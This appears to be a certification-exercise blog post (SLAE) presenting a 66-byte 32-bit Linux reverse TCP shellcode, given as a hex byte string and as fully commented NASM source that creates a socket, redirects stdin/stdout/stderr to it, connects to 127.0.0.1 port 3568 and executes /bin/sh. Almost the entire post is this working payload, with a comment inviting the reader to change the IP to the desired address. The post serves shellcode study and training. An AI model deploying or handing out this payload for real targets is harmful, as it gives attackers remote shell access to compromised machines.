Now to create a reasonably well-optimized Linux reverse TCP shellcode (66 bytes):
"\x31\xdb\xf7\xe3\x52\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\x68"
"\x7f\x00\x00\x01" <- IP address 127.0.0.1
"\x66\x68"
"\x0d\xf0" <- Port 3568
"\x66\x51\xb0\x3f\xcd\x80\x49\x79\xf9\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0"
"\x66\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x31\xc9\x89\xe3"
"\xb0\x0b\xcd\x80"
; Title Linux Reverse Shell TCP Shellcode v0.1
; Author npn
; License http://creativecommons.org/licenses/by-sa/3.0/
; Legitimate use and research only
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
;
;-----------------------------------------------------------------------
; Syntax: NASM / Intel, 32-bit Linux, int 0x80 syscall ABI
;         (eax = syscall number, ebx/ecx/edx = arguments, result in eax).
;
; Syscall sequence, in order (this ordering is the recognisable trait
; of the sample for anyone analysing it):
;   1. socketcall(SYS_SOCKET,  {AF_INET, SOCK_STREAM, 0})   -> fd
;   2. dup2(fd, 2), dup2(fd, 1), dup2(fd, 0)                (loop)
;   3. socketcall(SYS_CONNECT, {fd, &sockaddr_in, 16})
;   4. execve("//bin/sh", NULL, NULL)
;
; Register roles:
;   ebx  first 1 (SYS_SOCKET / SOCK_STREAM), then the socket fd
;   ecx  argument-block pointer; also the dup2 loop counter (2,1,0)
;   edx  0 from `mul ebx`; never written again, so it doubles as the
;        NUL terminator for the path string and as envp = NULL
;   eax  syscall number is always set via `mov al, N`, which assumes
;        the upper 24 bits of eax are already zero (true here only
;        because every preceding result is 0 or a small fd)
;
; NOTE(review): the SYS_CONNECT call reuses ebx, which at that point
; holds the socket fd rather than the constant 3. It therefore works
; only when socket() returns fd 3 (no fds beyond stdin/stdout/stderr
; open in the process) -- a fragile, environment-dependent assumption.
;
; Only 8 bytes of the sockaddr_in are built on the stack (family, port,
; address); the 16-byte length passed to connect makes the kernel read
; sin_zero from whatever was pushed earlier (AF_INET ignores sin_zero).
;-----------------------------------------------------------------------

global _start

section .text
_start:
        ; --- socket(AF_INET, SOCK_STREAM, 0) via socketcall -----------
        xor     ebx, ebx                ; ebx = 0
        mul     ebx                     ; eax = edx = 0 (edx stays 0 below)
        push    edx                     ; protocol = 0
        inc     ebx                     ; ebx = 1 = SYS_SOCKET
        push    ebx                     ; type = SOCK_STREAM (1)
        push    byte 0x2                ; domain = AF_INET (2)
        mov     ecx, esp                ; ecx -> {2, 1, 0} argument block
        mov     al, 0x66                ; socketcall
        int     0x80                    ; eax = socket fd

        ; --- redirect stdin/stdout/stderr to the socket ---------------
        xchg    ebx, eax                ; ebx = socket fd, eax = 1 (old ebx)
        pop     ecx                     ; ecx = 2 (the AF_INET value pushed above)

        ; sockaddr_in is built now so the value 2 in cx can be reused as
        ; sin_family; the dup2 loop that follows does not touch the stack
        push    0x0100007f              ; sin_addr = 127.0.0.1 (no NUL bytes); change to the desired IP
        push    word 0xf00d             ; sin_port = htons(3568)
        push    word cx                 ; sin_family = AF_INET
dup2:
        mov     al, 0x3f                ; dup2
        int     0x80                    ; dup2(fd, ecx) for ecx = 2, 1, 0
        dec     ecx
        jns     dup2                    ; loop until ecx goes negative (SF set)

        ; --- connect(fd, &sockaddr_in, 16) via socketcall -------------
        mov     ecx, esp                ; ecx -> sockaddr_in built above
        push    byte 0x10               ; addrlen = 16
        push    ecx                     ; &sockaddr_in
        push    ebx                     ; fd
        mov     ecx, esp                ; ecx -> {fd, &addr, 16} argument block
        mov     al, 0x66                ; socketcall
        int     0x80                    ; ebx is used as the call number here; see NOTE(review) above

        ; --- execve("//bin/sh", NULL, NULL) ----------------------------
        push    edx                     ; NUL terminator (edx is still 0)
        push    0x68732f6e              ; "n/sh"
        push    0x69622f2f              ; "//bi"  -> "//bin/sh\0" on the stack
        xor     ecx, ecx                ; argv = NULL
        mov     ebx, esp                ; ebx -> "//bin/sh"
        mov     al, 0xb                 ; execve (edx = envp = NULL)
        int     0x80
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-158